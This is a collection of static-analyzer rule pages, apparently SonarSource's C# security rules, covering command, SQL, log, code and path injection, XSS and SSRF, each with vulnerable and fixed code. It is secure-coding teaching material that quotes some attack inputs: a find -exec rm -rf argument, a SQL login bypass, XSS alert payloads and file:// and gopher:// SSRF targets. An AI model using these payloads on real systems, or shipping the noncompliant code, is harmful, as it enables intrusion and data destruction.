The most fundamental security mechanism is the restriction of LDAP metacharacters.

For Distinguished Names (DN), special characters that need to be escaped include:

  • \
  • #
  • +
  • <
  • >
  • ,
  • ;
  • "
  • =

For Search Filters, special characters that need to be escaped include:

  • *
  • (
  • )
  • \
  • null

In the compliant solution example, a validation mechanism is applied to untrusted input to ensure it is strictly composed of alphabetic characters.

Resources

Standards

roslyn.sonaranalyzer.security.cs:S5883

Why is this an issue?

OS command argument injections occur when applications allow the execution of operating system commands from untrusted data but the untrusted data is limited to the arguments.
It is not possible to directly inject arbitrary commands that compromise the underlying operating system, but the behavior of the executed command still might be influenced in a way that allows to expand access, for example, execution of arbitrary commands. The security of the application depends on the behavior of the application that is executed.

What is the potential impact?

An attacker exploiting an arguments injection vulnerability will be able to add arbitrary argument to a system binary call. Depending on the command the parameters are added to, this might lead to arbitrary command execution.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in .NET

Code examples

The following code uses the find command and expects the user to enter the name of a file to find on the system.

It is vulnerable to arguments injection because untrusted data is inserted directly into the arguments of a process call without sanitization.
The application assumes that incoming data always consists of a specific range of characters and ignores that some characters might force the find command to start a shell.

In this particular case, an attacker may remove files in /some/folder with the following string:

'*' -exec rm -rf {} \;

Noncompliant code example

public class ExampleController : Controller
{
    public void Run(string args)
    {
        Process p             = new Process();
        p.StartInfo.FileName  = "/usr/bin/find";
        p.StartInfo.Arguments = "/some/folder -iname " + args;
        p.Start();
    }
}

Compliant solution

public class ExampleController : Controller
{
    public void Run(string args)
    {
        Process p            = new Process();
        p.StartInfo.FileName = "/usr/bin/find";
        p.StartInfo.ArgumentList.Add("/some/folder");
        p.StartInfo.ArgumentList.Add("-iname");
        p.StartInfo.ArgumentList.Add(args);
        p.Start();
    }
}

How does this work?

Allowing users to insert data in operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our suggestion is to avoid using OS commands in the first place.

Here ArgumentList takes care of escaping the passed arguments and internally creates a single string given to the operating system when System.Diagnostics.Process.Start() is called.

Resources

Documentation

Standards

roslyn.sonaranalyzer.security.cs:S6641

Database connection strings control how an application connects to a database. They include information such as the location of the database, how to authenticate with the database, and how the connection should be secured.

The insertion of user-supplied values into a connection string can allow external control of these database connections.

Why is this an issue?

Connection strings contain a series of parameters that are structured as key/value pairs, similar to key1=value1;key2=value2.

If an attacker can control values that are inserted into the connection string, they may be able to insert additional parameters. These additional parameters can override values that were supplied earlier in the connection string.

What is the potential impact?

An attacker can use specially-crafted values to change how the database connection is made. These values can add new parameters to the connection string, or can override parameters that had already been specified.

Escalation of privilege

Some database servers allow authentication via an OS user account instead of a username and password. The database connection is authenticated as the user running the application. When this authentication mode is used, any username or password in the connection string are ignored.

If an attacker can force the use of this authentication mode, the connection will be made as the user that the web application is running under. This will often be the LocalSystem or NetworkService account on Windows. Such accounts are often given a high level of privileges on the database server.

Credential theft

If an attacker can change the database server in the connection string, they can have the web application connect to a server that they control. The web application will then authenticate with that server, allowing those credentials to be stolen.

Bypassing data validation

Many web applications implicitly trust data that’s stored in the database. The data is validated before it is stored, so no additional validation is performed when that data is loaded.

If an attacker can change the database server in the connection string, they can have the web application connect to a database server that they control. Invalid data in this database could be passed to other services or systems, or could be used to trigger other bugs and logic flaws in the web application.

Network traffic sniffing

The connection string can control how the connection to the database server is secured. For example, it can control whether connections to Microsoft SQL Server use transport layer security (TLS).

If an attacker can disable these network security measures and they have some way to monitor traffic between the web server and the database server, they will be able to see all information that’s written to and read from the database.

How to fix it in .NET

Microsoft’s database connection libraries typically provide a connection string builder class. These classes provide methods and properties that safely set parameter values.

Connection string builders will only protect you if you use these methods and properties to set parameter values. They will not help if you are using them to modify a connection string where user-supplied values have already been added.

If no connection string builder is available, user-supplied values must either be validated to ensure that they’re not malicious, or must be properly quoted so that they cannot interfere with other connection string parameters.

Code examples

Noncompliant code example

public string ConnectionString { get; set; } = "Server=10.0.0.101;Database=CustomerData";

public SqlConnection ConnectToDatabase(HttpRequest request)
{
    string connectionString = string.Format("{0};User ID={1};Password={2}",
        ConnectionString,
        request.Form["username"],
        request.Form["password"]);

    SqlConnection connection = new SqlConnection();
    connection.ConnectionString = connectionString; // Noncompliant
    connection.Open();
    return connection;
}

Compliant solution

public string ConnectionString { get; set; } = "Server=10.0.0.101;Database=CustomerData";

public SqlConnection ConnectToDatabase(HttpRequest request)
{
    SqlConnectionStringBuilder builder = new SqlConnectionStringBuilder(ConnectionString);
    builder.UserID = request.Form["username"];
    builder.Password = request.Form["password"];

    SqlConnection connection = new SqlConnection();
    connection.ConnectionString = builder.ConnectionString;
    connection.Open();
    return connection;
}

How does this work?

Connection string builders will ensure that values are correctly sanitized when adding them to the connection string.

Resources

Documentation

Conference presentations

Standards

roslyn.sonaranalyzer.security.cs:S5145

Why is this an issue?

Log injection occurs when an application fails to sanitize untrusted data used for logging.

An attacker can forge log content to prevent an organization from being able to trace back malicious activities.

What is the potential impact?

If an attacker can insert arbitrary data into a log file, the integrity of the chain of events being recorded can be compromised.
This frequently occurs because attackers can inject the log entry separator of the logger framework, commonly newlines, and thus insert artificial log entries.
Other attacks could also occur requiring only field pollution, such as cross-site scripting (XSS) or code injection (for example, Log4Shell) if the logged data is fed to other application components, which may interpret the injected data differently.

The focus of this rule is newline character replacement.

Log Forge

An attacker, able to create independent log entries by injecting log entry separators, inserts bogus data into a log file to conceal his malicious activities. This obscures the content for an incident response team to trace the origin of the breach as the indicators of compromise (IoCs) lead to fake application events.

How to fix it in ASP.NET

Code examples

The following code is vulnerable to log injection as it constructs log entries using untrusted data. An attacker can leverage this to manipulate the chain of events being recorded.

Noncompliant code example

using System.Web;
using System.Web.Mvc;

public class ExampleController : Controller
{
    private static readonly log4net.ILog _logger = log4net.LogManager.GetLogger(System.Reflection.MethodBase.GetCurrentMethod().DeclaringType);

    [HttpGet]
    public void Log(string data)
    {
        if (data != null)
        {
            _logger.Info("Log: " + data); // Noncompliant
        }
    }
}

Compliant solution

using System.Web;
using System.Web.Mvc;

public class ExampleController : Controller
{
    private static readonly log4net.ILog _logger = log4net.LogManager.GetLogger(System.Reflection.MethodBase.GetCurrentMethod().DeclaringType);

    [HttpGet]
    public void Log(string data)
    {
        if (data != null)
        {
            data = data.Replace('\n', '_').Replace('\r', '_');
            _logger.Info("Log: " + data);
        }
    }
}

How does this work?

Data used for logging should be content-restricted and typed. This can be done by validating the data content or sanitizing it.
Validation and sanitization mainly revolve around preventing carriage return (CR) and line feed (LF) characters. However, further actions could be required based on the application context and the logged data usage.

Resources

Standards

roslyn.sonaranalyzer.security.cs:S5167

This rule is deprecated; use S5122, S5146, S6287 instead.

Why is this an issue?

User-provided data, such as URL parameters, POST data payloads, or cookies, should always be considered untrusted and tainted. Applications constructing HTTP response headers based on tainted data could allow attackers to change security sensitive headers like Cross-Origin Resource Sharing headers.

Web application frameworks and servers might also allow attackers to inject new line characters in headers to craft malformed HTTP response. In this case the application would be vulnerable to a larger range of attacks like HTTP Response Splitting/Smuggling. Most of the time this type of attack is mitigated by default modern web application frameworks but there might be rare cases where older versions are still vulnerable.

As a best practice, applications that use user-provided data to construct the response header should always validate the data first. Validation should be based on a whitelist.

Noncompliant code example

string value = Request.QueryString["value"];
Response.AddHeader("X-Header", value); // Noncompliant

Compliant solution

string value = Request.QueryString["value"];
// Allow only alphanumeric characters
if (value == null || !Regex.IsMatch(value, "^[a-zA-Z0-9]+$"))
{
  throw new Exception("Invalid value");
}
Response.AddHeader("X-Header", value);

Resources

roslyn.sonaranalyzer.security.cs:S2076

Why is this an issue?

OS command injections occur when applications build command lines from untrusted data before executing them with a system shell.
In that case, an attacker can tamper with the command line construction and force the execution of unexpected commands. This can lead to the compromise of the underlying operating system.

What is the potential impact?

An attacker exploiting an OS command injection vulnerability will be able to execute arbitrary commands on the underlying operating system.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in .NET

Code examples

The following code is vulnerable to command injections because it is using untrusted inputs to set up a new process. Therefore an attacker can execute an arbitrary program that is installed on the system.

Noncompliant code example

public class ExampleController : Controller
{
    public void Run(string binary)
    {
        Process p = new Process();
        p.StartInfo.FileName = binary;
        p.Start();
    }
}

Compliant solution

public class ExampleController : Controller
{
    public void Run(string binary)
    {
        if (binary.Equals("/usr/bin/ls") || binary.Equals("/usr/bin/cat"))
        {
            // only ls and cat commands are authorized
            Process p = new Process();
            p.StartInfo.FileName = binary;
            p.Start();
        }
    }
}

How does this work?

Allowing users to execute operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our first suggestion is to avoid using OS commands in the first place.
However, if the application requires running OS commands with user-controlled data, here are some security suggestions.

Pre-Approved commands

If the application aims to execute only a small number of OS commands (for example, ls, pwd, and grep), the cleanest way to avoid this problem is to validate the input before using it in an OS command.

Create a list of authorized and secure commands that you want the application to be able to execute. Use absolute paths to avoid any ambiguity.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Depending on the number of commands you want the application to support, the list can be either a regex string or any array type. If you use regexes, choose simple regexes to avoid ReDOS attacks. For example, you can accept only a specific set of executables, by using ^/bin/(ls|pwd|grep)$.

Important note: The application must do validation on the server side. Not on client-side front-ends.

Neutralize special characters

If the application is to execute complex commands that cannot be controlled thanks to pre-approved lists, the cleanest approach is to use special sanitization components, such as System.Diagnostics.ProcessStartInfo.

The library helps you to get rid of common dangerous characters, such as:

  • &
  • |
  • ;
  • $
  • >
  • <
  • \`
  • \\
  • !

If user input is to be included in the arguments of a command, the application must ensure that dangerous options or argument delimiters are neutralized.
Argument delimiters count ', - and spaces.

For example, the find command from UNIX supports the dangerous argument -exec.
In this case, option processing can be terminated with a string containing -- or with special options. For example, git supports --end-of-options since its version 2.24.

Here, using the ProcessStartInfo structure helps escaping the passed arguments and internally creates a single string given to the operating system when System.Diagnostics.Process.Start() is called.

Resources

Documentation

Standards

roslyn.sonaranalyzer.security.cs:S5334

Why is this an issue?

Code injections occur when applications allow the dynamic execution of code instructions from untrusted data.
An attacker can influence the behavior of the targeted application and modify it to get access to sensitive data.

What is the potential impact?

An attacker exploiting a dynamic code injection vulnerability will be able to execute arbitrary code in the context of the vulnerable application.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process that executes the code runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of code injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in .NET

Code examples

The following code is vulnerable to arbitrary code execution because it compiles and runs HTTP data.

Noncompliant code example

using System.CodeDom.Compiler;

public class ExampleController : Controller
{
    public void Run(string message)
    {
        const string code = @"
            using System;
            public class MyClass
            {
                public void MyMethod()
                {
                    Console.WriteLine(""" + message + @""");
                }
            }
        ";

        var provider = CodeDomProvider.CreateProvider("CSharp");
        var compilerParameters = new CompilerParameters { ReferencedAssemblies = { "System.dll", "System.Runtime.dll" } };
        var compilerResults = provider.CompileAssemblyFromSource(compilerParameters, code);
        object myInstance = compilerResults.CompiledAssembly.CreateInstance("MyClass");
        myInstance.GetType().GetMethod("MyMethod").Invoke(myInstance, new object[0]);
    }
}

Compliant solution

using System.CodeDom.Compiler;

public class ExampleController : Controller
{
    public void Run(string message)
    {
        const string code = @"
            using System;
            public class MyClass
            {
                public void MyMethod(string input)
                {
                    Console.WriteLine(input);
                }
            }
        ";

        var provider = CodeDomProvider.CreateProvider("CSharp");
        var compilerParameters = new CompilerParameters { ReferencedAssemblies = { "System.dll", "System.Runtime.dll" } };
        var compilerResults = provider.CompileAssemblyFromSource(compilerParameters, code);
        object myInstance = compilerResults.CompiledAssembly.CreateInstance("MyClass");
        myInstance.GetType().GetMethod("MyMethod").Invoke(myInstance, new object[]{ message }); // Pass message to dynamic method
    }
}

How does this work?

Allowing users to execute code dynamically generally creates more problems than it solves.

Anything that can be done via dynamic code execution can usually be done via a language’s native SDK and static code.
Therefore, our suggestion is to avoid executing code dynamically.
If the application requires the execution of dynamic code, additional security measures must be taken.

Dynamic parameters

When the untrusted values are only expected to be values used in standard processing, it is generally possible to provide them as parameters of the dynamic code. In that case, care should be taken to ensure that only the name of the untrusted parameter is passed to the dynamic code and not that its value is expanded into it. After that, the dynamic code will be able to safely access the untrusted parameter content and perform the processing.

The compliant code example uses such an approach.

Allow list

When the untrusted parameters are expected to contain operators, function names or other reflection-related values, best practices would encourage using an allow list. This one would contain a list of accepted safe values that can be used as part of the dynamic code.

When receiving an untrusted parameter, the application would verify its value is contained in the configured allow list. If it is present, the parameter is accepted. Otherwise, it is rejected and an error is raised.

Another similar approach is using a binding between identifiers and accepted values. That way, users are only allowed to provide identifiers, where only valid ones can be converted to a safe value.

Resources

Articles & blog posts

Standards

roslyn.sonaranalyzer.security.cs:S6639

Memory allocation injections occur when an application computes the size of a piece of memory to be allocated from an untrusted source. In such a case, an attacker could be able to make the application unwillingly consume an important amount of memory by enforcing a large allocation size.

Why is this an issue?

By repeatedly requesting a feature that consumes a lot of memory, attackers can constantly occupy an important part of an application’s hosting server memory. Depending on the application’s deployment architecture, hosting server resources and attackers' capabilities, this can lead to an exhaustion of the available server’s memory.

What is the potential impact?

A server that faces a memory exhaustion situation can become unstable. The exact impact will depend on how the affected application is deployed and how well the hosting server configuration is hardened.

In the worst case, when the application is deployed in an uncontained environment, directly on its host system, the memory exhaustion will affect the whole hosting server. The server’s operating system might start killing arbitrary memory-intensive processes, including the main application or other sensitive ones. This will result in a general operating failure, also known as a Denial of Service (DoS).

In cases where the application is deployed in a virtualized or otherwise contained environment, or where memory usage limits are in place, the consequences are limited to the vulnerable application only. In that case, other processes and applications hosted on the same server may keep on running without perturbation. The mainly affected application will still stop working properly.

In general, that kind of DoS attack can have severe financial consequences. They are particularly important when the affected systems are business-critical.

How to fix it in .NET

Code examples

The following code is vulnerable to a memory allocation injection because the size of a memory allocation is determined using a user-controlled source. It then performs the actual allocation without any verification or other sanitization over the provided size.

Noncompliant code example

[Route("NonCompliantArrayList")]
public string NonCompliantArrayList()
{
    int size;
    try
    {
        size = int.Parse(Request.Query["size"]);
    }
    catch (FormatException)
    {
        return "Number format exception while reading size";
    }
    ArrayList arrayList = new ArrayList(size); // Noncompliant
    return size + " bytes were allocated.";
}

Compliant solution

public const int MAX_ALLOC_SIZE = 1024;

[Route("CompliantArrayList")]
public string CompliantArrayList()
{
    int size;
    try
    {
        size = int.Parse(Request.Query["size"]);
    }
    catch (FormatException)
    {
        return "Number format exception while reading size";
    }
    size = Math.Min(size, MAX_ALLOC_SIZE);
    ArrayList arrayList = new ArrayList(size);
    return size + " bytes were allocated.";
}

How does this work?

Enforce an upper limit

When performing a memory allocation whose size depends on a user-controlled parameter, it is of prime importance to enforce an upper limit to the size being allocated. This will prevent any overly big memory slot from being consumed by a single allocation.

Note that forcing an upper limit will not prevent Denial of Service attacks. When an allocation size is restricted to a reasonable amount, attackers can still request the allocating feature multiple times until the combined allocation size becomes big enough to cause exhaustion. However, the smaller the allowed allocation size, the higher the number of necessary requests and, thus, the higher the required resources on the attacker side. As for most of the DoS attack vectors, a trade-off must be found to prevent most attackers from causing exhaustion while keeping a good level of performance and usability.

Here, the example compliant code uses the Math.Min function to enforce a reasonable upper bound to the allocation size. In that case, no more than 1024 bytes can be allocated at a time.

Harden the execution environment configuration

As a defense in depth measure, it is advised to harden the execution environment configuration regarding memory usage. This can effectively reduce the scope of a successful Denial of Service attack and prevent a complete outage, potentially ranging over multiple applications.

When running the application in a contained environment, like a Docker container, it is usually possible to limit the amount of memory provided to the contained environment. In that case, memory exhaustion will only impact the application hosting container and not the host system.

When running the application directly on a physical or heavy virtualized server, memory limits can sometimes be set on the application’s associated service account. For example, the ulimit mechanism of Unix based operating systems can be used for that purpose. With such a limit set up, memory exhaustion only impacts the applications and processes owned by the related service account.

Resources

Documentation

  • OWASP - Denial of Service
  • Linux.org - pam_limits - PAM module to limit resources
  • RedHat - How to set limits for services in RHEL and systemd

Standards

roslyn.sonaranalyzer.security.cs:S3649

Why is this an issue?

Database injections (such as SQL injections) occur in an application when the application retrieves data from a user or a third-party service and inserts it into a database query without sanitizing it first.

If an application contains a database query that is vulnerable to injections, it is exposed to attacks that target any database where that query is used.

A user with malicious intent carefully performs actions whose goal is to modify the existing query to change its logic to a malicious one.

After creating the malicious request, the attacker can attack the databases affected by this vulnerability without relying on any pre-requisites.

What is the potential impact?

In the context of a web application that is vulnerable to SQL injection:
After discovering the injection, attackers inject data into the vulnerable field to execute malicious commands in the affected databases.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Identity spoofing and data manipulation

A malicious database query enables privilege escalation or direct data leakage from one or more databases. This threat is the most widespread impact.

Data deletion and denial of service

The malicious query makes it possible for the attacker to delete data in the affected databases.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Chaining DB injections with other vulnerabilities

Attackers who exploit SQL injections rely on other vulnerabilities to maximize their profits.
Most of the time, organizations overlook some defense in depth measures because they assume attackers cannot reach certain points in the infrastructure. This misbehavior can lead to multiple attacks with great impact:

  • When secrets are stored unencrypted in databases: Secrets can be exfiltrated and lead to compromise of other components.
  • If server-side OS and/or database permissions are misconfigured, injection can lead to remote code execution (RCE).

How to fix it in Entity Framework Core

Code examples

The following code is an example of an overly simple authentication function. It is vulnerable to SQL injection because user-controlled data is inserted directly into a query string: The application assumes that incoming data always has a specific range of characters, and ignores that some characters may change the query logic to a malicious one.

In this particular case, the query can be exploited with the following string:

foo' OR 1=1 --

By adapting and inserting this template string into one of the fields (user or pass), an attacker would be able to log in as any user within the scoped user table.

Noncompliant code example

public class ExampleController : Controller
{
    private readonly UserAccountContext Context;

    public IActionResult Authenticate(string user, string pass)
    {
        var query = "SELECT * FROM users WHERE user = '" + user + "' AND pass = '" + pass + "'";

        var queryResults = Context
            .Database
            .FromSqlRaw(query);

        if (queryResults == 0)
        {
            return Unauthorized();
        }

        return Ok();
    }
}

Compliant solution

public class ExampleController : Controller
{
    private readonly UserAccountContext Context;

    public IActionResult Authenticate(string user, string pass)
    {
        var query = "SELECT * FROM users WHERE user = {0} AND pass = {1}";

        var queryResults = Context
            .Database
            .FromSqlRaw(query, user, pass);

        if (queryResults == 0)
        {
            return Unauthorized();
        }

        return Ok();
    }
}

How does this work?

Use prepared statements

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of an interpreted context.

For database queries, prepared statements are a natural mechanism to achieve this due to their internal workings.
Here is an example with the following query string (Java SE syntax):

SELECT * FROM users WHERE user = ? AND pass = ?

Note: Placeholders may take different forms, depending on the library used. For the above example, the question mark symbol '?' was used as a placeholder.

When a prepared statement is used by an application, the database server compiles the query logic even before the application passes the literals corresponding to the placeholders to the database.
Some libraries expose a prepareStatement function that explicitly does so, and some do not - because they do it transparently.

The compiled code that contains the query logic also includes the placeholders: they serve as parameters.

After compilation, the query logic is frozen and cannot be changed.
So when the application passes the literals that replace the placeholders, they are not considered application logic by the database.

Consequently, the database server prevents the dynamic literals of a prepared statement from affecting the underlying query, and thus sanitizes them.

On the other hand, the application does not automatically sanitize third-party data (for example, user-controlled data) inserted directly into a query. An attacker who controls this third-party data can cause the database to execute malicious code.

Resources

Articles & blog posts

Standards

roslyn.sonaranalyzer.security.cs:S5131

This vulnerability makes it possible to temporarily execute JavaScript code in the context of the application, granting access to the session of the victim. This is possible because user-provided data, such as URL parameters, are copied into the HTML body of the HTTP response that is sent back to the user.

Why is this an issue?

Reflected cross-site scripting (XSS) occurs in a web application when the application retrieves data like parameters or headers from an incoming HTTP request and inserts it into its HTTP response without first sanitizing it. The most common cause is the insertion of GET parameters.

When well-intentioned users open a link to a page that is vulnerable to reflected XSS, they are exposed to attacks that target their own browser.

A user with malicious intent carefully crafts the link beforehand.

After creating this link, the attacker must use phishing techniques to ensure that his target users click on the link.

What is the potential impact?

A well-intentioned user opens a malicious link that injects data into the web application. This data can be text, but it can also be arbitrary code that can be interpreted by the target user’s browser, such as HTML, CSS, or JavaScript.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Vandalism on the front-end website

The malicious link defaces the target web application from the perspective of the user who is the victim. This may result in loss of integrity and theft of the benevolent user’s data.

Identity spoofing

The forged link injects malicious code into the web application. The code enables identity spoofing thanks to cookie theft.

Record user activity

The forged link injects malicious code into the web application. To leak confidential information, attackers can inject code that records keyboard activity (keylogger) and even requests access to other devices, such as the camera or microphone.

Chaining XSS with other vulnerabilities

In many cases, bug hunters and attackers chain cross-site scripting vulnerabilities with other vulnerabilities to maximize their impact.
For example, an XSS can be used as the first step to exploit more dangerous vulnerabilities or features that require higher privileges, such as a code injection vulnerability in the admin control panel of a web application.

How to fix it in ASP.NET

Code examples

Noncompliant code example

using System.Web;
using System.Web.Mvc;

public class HelloController : Controller
{
    [HttpGet]
    public void Hello(string name, HttpResponse response)
    {
        string html = "<h1>Hello"+ name +"</h1>"
        response.Write(html);
    }
}

Compliant solution

using System.Web;
using System.Web.Mvc;

public class HelloController : Controller
{
    [HttpGet]
    public void Hello(string name, HttpResponse response)
    {
        string html = "<h1>Hello"+ HttpUtility.HtmlEncode(name) +"</h1>"
        response.Write(html);
    }
}

How does this work?

If the HTTP response is HTML code, it is highly recommended to use Razor-based view templates to generate it. This template engine separates the view from the business logic and automatically encodes the output of variables, drastically reducing the risk of cross-site scripting vulnerabilities.

Encode data according to the HTML context

The best approach to protect against XSS is to systematically encode data that is written to HTML documents. The goal is to leave the data intact from the end user’s point of view but make it uninterpretable by web browsers.

XSS exploitation techniques vary depending on the HTML context where malicious input is injected. For each HTML context, there is a specific encoding to prevent JavaScript code from being interpreted. The following table summarizes the encoding to apply for each HTML context.

ContextCode exampleExploit exampleEncoding

Inbetween tags

<!doctype html>
<div>
  { data }
</div>
<!doctype html>
<div>
  <script>
    alert(1)
  </script>
</div>

HTML entity encoding: replace the following characters by HTML-safe sequences.

  • & → &amp;
  • < → &lt;
  • > → &gt;
  • " → &quot;
  • ' → &#x27;

In an attribute surrounded with single or double quotes

<!doctype html>
<div tag="{ data }">
  ...
</div>
<!doctype html>
<div tag=""
     onmouseover="alert(1)">
  ...
</div>

HTML entity encoding: replace the following characters with HTML-safe sequences.

  • & → &amp;
  • < → &lt;
  • > → &gt;
  • " → &quot;
  • ' → &#x27;

In an unquoted attribute

<!doctype html>
<div tag={ data }>
  ...
</div>
<!doctype html>
<div tag=foo
     onmouseover=alert(1)>
  ...
</div>

Dangerous context: HTML output encoding will not prevent XSS fully.

In a URL attribute

<!doctype html>
<a href="{ data }">
  ...
</a>
<!doctype html>
<a href="javascript:alert(1)">
  ...
</a>

Validate the URL by parsing the data. Make sure relative URLs start with a / and that absolute URLs use https as a scheme.

In a script block

<!doctype html>
<script>
  { data }
</script>
<!doctype html>
<script>
  alert(1)
</script>

Dangerous context: HTML output encoding will not prevent XSS fully. To pass values to a JavaScript context, the recommended way is to use a data attribute:

<!doctype html>
<script data="{ data }">
  ...
</script>

System.Web.HttpUtility.HtmlEncode is the recommended method to encode HTML entities.

Pitfalls

The limits of validation

Validation of user inputs is a good practice to protect against various injection attacks. But for XSS, validation on its own is not the recommended approach.

As an example, filtering out user inputs based on a deny-list will never fully prevent XSS vulnerability from being exploited. This practice is sometimes used by web application firewalls. It is only a matter of time for malicious users to find the exploitation payload that will defeat the filters.

Another example is applications that allow users or third-party services to send HTML content to be used by the application. A common approach is trying to parse HTML and strip sensitive HTML tags. Again, this deny-list approach is vulnerable by design: maintaining a list of sensitive HTML tags, in the long run, is very difficult.

A preferred option is to use Markdown in conjunction with a parser that removes embedded HTML and restricts the use of "javascript:" URI.

Going the extra mile

Content Security Policy (CSP) Header

With a defense-in-depth security approach, the CSP response header can be added to instruct client browsers to block loading data that does not meet the application’s security requirements. If configured correctly, this can prevent any attempt to exploit XSS in the application.
Learn more here.

Resources

Documentation

Articles & blog posts

Conference presentations

Standards

roslyn.sonaranalyzer.security.cs:S5144

Why is this an issue?

Server-Side Request Forgery (SSRF) occurs when attackers can coerce a server to perform arbitrary requests on their behalf.

An SSRF vulnerability can either be basic or blind, depending on whether the server’s fetched data is directly returned in the web application’s response.
The absence of the corresponding response for the coerced request on the application is not a barrier to exploitation and thus must be treated in the same way as basic SSRF.

What is the potential impact?

SSRF usually results in unauthorized actions or data disclosure in the vulnerable application or on a different system it can reach. Conditional to what is reachable, remote command execution can be achieved, although it often requires chaining with further exploitations.

Information disclosure is SSRF’s core outcome. Depending on the extracted data, an attacker can perform a variety of different actions that can range from low to critical severity.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Local file read to host takeover

An attacker manipulates an application into performing a local request for a sensitive file, such as ~/.ssh/id_rsa, by using the File URI scheme file://.
Once in possession of the SSH keys, the attacker establishes a remote connection to the system hosting the web application.

Internal Network Reconnaissance

An attacker enumerates internal accessible ports from the affected server or others to which the server can communicate by iterating over the port field in the URL http://127.0.0.1:{port}.
Taking advantage of other supported URL schemas (dependent on the affected system), for example, gopher://127.0.0.1:3306, an attacker would be able to connect to a database service and perform queries on it.

How to fix it in ASP.NET

Code examples

The following code is vulnerable to SSRF as it performs an HTTP request to a URL defined by untrusted data.

Noncompliant code example

using System.Web;
using System.Web.Mvc;

public class ExampleController: Controller
{
    [HttpGet]
    public IActionResult ImageFetch(string location)
    {
        HttpWebRequest request = (HttpWebRequest)WebRequest.Create(location);

        return Ok();
    }
}

Compliant solution

using System.Web;
using System.Web.Mvc;

public class ExampleController: Controller
{
    private readonly string[] allowedSchemes = { "https" };
    private readonly string[] allowedDomains = { "trusted1.example.com", "trusted2.example.com" };

    [HttpGet]
    public IActionResult ImageFetch(string location)
    {
        Uri uri = new Uri(location);

        if (!allowedDomains.Contains(uri.Host) && !allowedSchemes.Contains(uri.Scheme))
        {
            return BadRequest();
        }

        HttpWebRequest request = (HttpWebRequest)WebRequest.Create(uri);

        return Ok();
    }
}

How does this work?

The application should avoid opening URLs that are constructed with untrusted data.

When such a feature is strictly necessary, SSRF can be mitigated by applying an allow-list of trustable schemes and domains.

The compliant code example uses such an approach.

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the SSRF vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com") or an equivalent with the regex ^https://example\.com.* can be exploited with the following URL https://example.commit.malicious.io.

Resources

Standards

roslyn.sonaranalyzer.security.cs:S2083

Why is this an issue?

Path injections occur when an application uses untrusted data to construct a file path and access this file without validating its path first.

A user with malicious intent would inject specially crafted values, such as ../, to change the initial intended path. The resulting path would resolve somewhere in the filesystem where the user should not normally have access to.

What is the potential impact?

A web application is vulnerable to path injection and an attacker is able to exploit it.

The files that can be affected are limited by the permission of the process that runs the application. Worst case scenario: the process runs with root privileges on Linux, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Override or delete arbitrary files

The injected path component tampers with the location of a file the application is supposed to delete or write into. The vulnerability is exploited to remove or corrupt files that are critical for the application or for the system to work properly.

It could result in data being lost or the application being unavailable.

Read arbitrary files

The injected path component tampers with the location of a file the application is supposed to read and output. The vulnerability is exploited to leak the content of arbitrary files from the file system, including sensitive files like SSH private keys.

How to fix it in .NET

Code examples

The following code is vulnerable to path injection as it creates a path using untrusted data without validation.

An attacker can exploit the vulnerability in this code to delete arbitrary files.

Noncompliant code example

public class ExampleController : Controller
{
    private static string TargetDirectory = "/path/to/target/directory/";

    public void Example(string filename)
    {
        string path = Path.Combine(TargetDirectory, filename);
        System.IO.File.Delete(path);
    }
}
